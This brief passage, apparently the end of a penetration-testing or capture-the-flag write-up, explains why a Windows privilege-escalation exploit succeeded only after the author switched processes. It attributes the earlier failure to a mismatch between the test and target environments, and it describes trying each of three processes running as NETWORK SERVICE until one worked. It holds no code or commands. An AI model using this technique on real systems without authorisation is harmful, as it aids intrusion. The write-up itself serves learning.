Why did PE succeed after changing the process?
The cause is said to be a mismatch between the environment in which the exploit code was tested and the environment of the target machine; for example, a different OS can mean a different amount of memory.
This time, as it happened, there were only three processes on the target running as NT AUTHORITY\NETWORK SERVICE, so I was able to try them all until one worked...
That's all.